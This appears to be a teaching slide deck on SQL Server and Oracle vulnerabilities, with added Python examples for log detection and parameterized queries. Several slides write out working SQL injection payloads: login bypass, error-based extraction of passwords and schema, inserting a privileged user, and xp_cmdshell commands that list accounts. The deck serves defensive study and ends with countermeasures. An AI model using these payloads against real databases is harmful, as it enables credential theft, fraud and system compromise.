
sql server vulnerabilities

benjamin


    1. 1 SQL Server Vulnerabilities

    2. 2

    3. 3 Vulnerability Identification
       - Vulnerabilities are usually identified during the audit phase
       - Most vulnerabilities emanate from dynamic systems
       - Example: dynamically creating a file image in a temporary directory is a useful feature that allows downloading of the file image
       - The vulnerability is that this feature could be exploited to download the source code of an ASP script

    4. 4 Vulnerability Identification
       - Example: www.example.com/getimage.asp?f=12345678&e=gif is an allowed operation
       - www.example.com/getimage.asp?f=..\maketrade.asp%00&e=gif is an exploit
       - The vulnerability is that the “f” parameter can allow access to files in its parent directory path
       - %00 passes a null character that suppresses the restriction to “gif” files only

    5. 5 Vulnerability Identification
       - Character insertion vulnerabilities: single quote, double quote, #, ||
       - SQL reserved words insertion: tab %09, carriage return %0d, linefeed %0a, space %00
       - Make the system wait while executing a query: '1+waitfor+delay+'0:0:10'--

    6. 6 Exploiting Vulnerabilities
       - Creation of a new user
       - Select * from users where username = 'fred' and password = 'sesame'
       - Select * from users where username = 'fr'ed' and password = 'sesame'
       - Using the value ' or 1=1-- for username will log in as the first user in the users table
       - Select * from users where username = ' or 1 in (select password from users where username='admin')-- will give an error message that contains the password for admin

    7. 7 Exploiting Vulnerabilities
       - Select * from users where username = ' or 1 in (select 'a'+str(id) from sysobjects where name='users')-- will give an error message that contains the information needed to find the column names (e.g., syntax error converting the varchar value 'a 2815072' to a column of data type int)
       - Select * from users where username = ' or 1 in (select name from syscolumns where id=2815072 and colorder > 0)-- will give the column name
       - Successively replacing colorder > 0 with colorder > 1, 2, 3, etc., one can find the names of all columns

    8. 8 Exploiting Vulnerabilities
       - Assume that the column names are id, username, password, transaction_limit, settings_file
       - Select * from users where username = ' or 1 in (select 'a'+str(max(id)) from users)-- will give the maximum id value, corresponding to the last user in the table
       - Select * from users where username = ' or 1 in (select 'a'+str(max(transaction_limit)) from users)-- will give the maximum value of transaction limit for any user

    9. 9 Exploiting Vulnerabilities
       - Next we can find the settings_file value using Select * from users where username = ' or 1 in (select settings_file from users)--
       - Select * from users where username = '; insert into users values (5, 'test', 'test', 10000000, 'd:\userprofiles\admin.prof')-- will create a user called test with password test and a transaction limit of $10 million

    10. 10 Exploiting Vulnerabilities
       - In the absence of error messages, see if sysadmin is logged in: when the following code is placed in the middle of an SQL command, if(is_srvrolemember('sysadmin')>0) waitfor delay '0:0:5', a pause in execution is an indication that the sysadmin is logged in
       - Exploiting from the command line: Select * from users where username = 'asmith'; exec xp_cmdshell 'dir > c:\foo.txt'--

    11. 11 Exploiting Vulnerabilities
       - Exploiting from the command line: Select * from users where username = 'asmith'; exec xp_cmdshell 'nslookup thisisatest 192.168.1.1'-- will look for the host thisisatest on the DNS server 192.168.1.1

    12. 12 Exploiting Vulnerabilities
       - Creating a temporary table and storing user account information in it
       - Example: Select * from users where username = '; create table foo(a int identity(1,1), b varchar(4000)); insert into foo exec xp_cmdshell 'cmd /c net user'-- will create the table foo
       - Select * from users where username = ' or 1 in (select b from foo where a=1)-- will give the user account information for the first user

    13. 13 Exploiting Vulnerabilities
       Vulnerable extended stored procedures in the sp_OA family are:
       - sp_OACreate
       - sp_OADestroy
       - sp_OAGetErrorInfo
       - sp_OAGetProperty
       - sp_OAMethod
       - sp_OASetProperty
       - sp_OAStop

    14. 14 Exploiting Vulnerabilities
       - SQL Server outputs plenty of usable error messages
       - Both Oracle and MySQL do not output many usable error messages
       - SQL Server does an implicit conversion of integers to strings where necessary, making it easy for hackers to guess data types
       - Use of the single-line comment character sequence --
       - Query batching feature (i.e., multiple queries can be run in sequence by separating them with a semicolon)

    15. 15 Exploiting Vulnerabilities
       Input sources through which SQL can be injected into SQL Server:
       - Web server scripts with query string parameters (e.g., http://www.example.com/query.asp?username=fred)
       - Form parameters
       - Cookie values
       - HTTP request headers such as Host, User-Agent, Pragma, Accept
       - Registry keys/values
       - Filenames
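Slides 14 and 15 list the syntax injection relies on (the -- comment marker, batching, xp_cmdshell, the %00 null byte) and the request fields it can arrive in. The following is an added detection example, not part of the presentation: it URL-decodes the request line, Referer and User-Agent of constructed web-server log lines and flags those markers. The log lines, signature names and the choice of fields are assumptions.

```python
import re
from urllib.parse import unquote

# Markers taken from the slides; each name is a constructed label.
SIGNATURES = {
    "null byte": "\x00",
    "sql comment": "--",
    "time delay probe": "waitfor delay",
    "command shell": "xp_cmdshell",
    "ole automation": "sp_oa",
    "system catalog": "sysobjects",
}

# Constructed lines in Apache combined log format; not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2005:10:00:01 +0000] "GET /getimage.asp?f=12345678&e=gif HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2005:10:00:02 +0000] "GET /getimage.asp?f=..%5Cmaketrade.asp%00&e=gif HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2005:10:00:03 +0000] "GET /login.asp?username=%27%20or%201%3D1--&password=x HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2005:10:00:04 +0000] "GET /login.asp?username=asmith%27%3B%20exec%20xp_cmdshell%20%27dir%27-- HTTP/1.1" 500 300 "-" "Mozilla/4.0"
10.0.0.7 - - [01/Jan/2005:10:00:05 +0000] "GET /query.asp?username=fred HTTP/1.1" 200 800 "-" "x' waitfor delay '0:0:5'--"
"""

# Request line, status, size, then the two quoted header-derived fields.
LINE_RE = re.compile(r'"(?P<request>[^"]*)" \d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

def indicators(text):
    # Decode once and lowercase so %27/%00 and mixed-case keywords are caught.
    decoded = unquote(text).lower()
    return [name for name, needle in SIGNATURES.items() if needle in decoded]

def scan_log(log_text):
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.search(line)
        if not m:
            continue
        # Slide 15: query strings and headers such as User-Agent are all
        # injection vectors, so every captured field is inspected.
        for field in ("request", "referer", "agent"):
            found = indicators(m.group(field))
            if found:
                hits.append((lineno, field, found))
    return hits

if __name__ == "__main__":
    for lineno, field, found in scan_log(SAMPLE_LOG):
        print(f"line {lineno} {field}: {', '.join(found)}")
```

A lone single quote is deliberately not a signature, since legitimate names contain one; the benign first line therefore produces no hit.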

    16. 16 Countermeasures
       - User input should not be placed unmodified directly into the SQL query
       - Extended stored procedures should not be available to anyone with the public role
       - The application should not connect to the database as 'sa'
       - SQL Server should not be installed to run under the SYSTEM or LocalSystem account

    17. 17 Countermeasures
       - Allow only known good input
       - Strip or reject bad input
       - Avoid running a query of the user's choice
       - Do not rush software that is still under development into production
       - Address security issues at design time
       - Turn off unnecessary error messages

    18. 18 Best Practices
       - Input validation
       - Specify the data type at design time for all variables receiving data from user input
       - Set up an input filter to allow only good data (i.e., data of the form '--' will be filtered out)
       - Aim for designing 'strength in depth'
       - Use the 'principle of least privilege' (i.e., grant only the privileges necessary for performing the function)
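Slides 16 to 18 give the countermeasures: never paste user input into the query text, allow only known good input, and strip or reject the rest. The following is an added example, not code from the presentation, showing the slide 6 login query built by concatenation beside the same query with bound parameters and an allowlist check. It assumes sqlite3 as an offline stand-in for SQL Server; the table rows, the username pattern and the function names are constructed.

```python
import re
import sqlite3

# Constructed sample rows standing in for the deck's "users" table
# (columns id, username, password, transaction_limit, settings_file).
SAMPLE_USERS = [
    (1, "admin", "s3cret", 1000, r"d:\userprofiles\admin.prof"),
    (2, "fred", "sesame", 100, r"d:\userprofiles\fred.prof"),
]

# Assumption: sqlite3 is an offline stand-in for SQL Server; the string
# concatenation bug and the placeholder fix behave the same on both.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id int, username text, password text, "
                 "transaction_limit int, settings_file text)")
    conn.executemany("insert into users values (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn

def login_vulnerable(conn, username, password):
    # Slide 6's pattern: user input pasted straight into the SQL text, so a
    # quote ends the literal and -- comments out the password check.
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchone()

# Slide 18: allow only known good input. An allowlist of characters and a
# length bound, rather than stripping '--' and hoping nothing else gets by.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def login_safe(conn, username, password):
    if not USERNAME_RE.fullmatch(username):
        return None
    # Bound parameters travel as data; the driver never treats a quote or a
    # comment marker inside them as SQL syntax.
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1--", "x"))  # first user, password never checked
    print(login_safe(db, "' or 1=1--", "x"))        # None
    print(login_safe(db, "fred", "sesame"))         # fred's row
```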

    19. 19 Best Practices
       - Run SQL Server with least privileges
       - Restrict execution of extended stored procedures
       - Apply change control and version control in development
       - Perform periodic security code review
       - Have policies in place to identify how emergency application changes will be handled

    20. 20 Best Practices
       - Check the permissions associated with pre-configured roles: db_accessadmin, db_owner, db_securityadmin, public
       - Check statement-level and object-level permissions:
         - Statement-level permissions: create table, view, sp
         - Object-level permissions: select, update, insert

    21. 21 Best Practices
       - Physically secure the database server
       - Use an NTFS disk partition
       - Also use EFS with NTFS for suitable encryption
       - Rename the local admin account
       - Enable security auditing for logins
       - Install virus protection software
       - Disable all unnecessary services on the server, such as print server

    22. 22 Best Practices
       - Create domain groups and assign users to domain groups
       - Grant the necessary privileges to domain groups
       - Use firewalls
       - Disable TCP port 1433 and UDP port 1434 on the firewall
       - Place the database server on a secure subnet of the network

    23. 23 Best Practices
       - Monitor Microsoft for patches
       - Always use stored procedures in applications
       - Do not allow dynamic SQL creation in stored procedures
       - Have all objects share the same owner (e.g., dbo)

    24. 24 Oracle Vulnerabilities
       - If the Oracle listener is configured to accept network connections, it would allow execution of any function on the host OS
       - Users with CREATE LIBRARY permission could make arbitrary calls to the OS
       - Files created to run a Java applet could reveal the username and password used for database authentication (problem with the default Apache configuration)

    25. 25 Oracle Vulnerabilities

    26. 26 Oracle Vulnerabilities
       - In Figure 1, the client request comes through a firewall to the web server, which connects to the database through the TNS listener
       - Vulnerabilities in the Apache server allow DoS attacks and buffer overflow attacks
       - NGS Software has identified several vulnerabilities through its NGSSoftware Insight Security Research Advisory (NISR) series

    27. 27 Oracle Vulnerabilities
       1. Oracle extproc local command execution (#NISR23122004C) (NOT PATCHED)
       2. Oracle ISQLPlus file access vulnerability (#NISR2122004E)
       3. Oracle TNS Listener DoS (#NISR2122004F)
       4. Oracle multiple PL/SQL injection vulnerabilities (#NISR2122004H)
       5. Oracle wrapped procedure overflow (#NISR2122004J)
       6. Oracle extproc directory traversal (#NISR23122004B)
       7. Oracle extproc buffer overflow (#NISR23122004A)
       8. Oracle clear text passwords (#NISR2122004D)
       9. Oracle Character Conversion Bugs (#NISR2122004G)

    28. 28 References
       - Tool Command Language (TCL) substitution character list: http://tmml.sourceforge.net/doc/tcl/Tcl.html
       - Proof-of-Concept (POC) attack: http://www.appsecinc.com/resources/freetools/
       - SQL Injection: http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

    29. 29 References
       - Oracle vulnerabilities: http://www.counterpane.com/alert-oracle.html
       - David Litchfield's paper on Oracle vulnerabilities: http://www.nextgenss.com/papers/hpoas.pdf
       - NGS Software Oracle vulnerabilities list (Dec. '04): http://dbaoracle.com/oracle_news/2004_12_31_serious_vulberabilities.htm
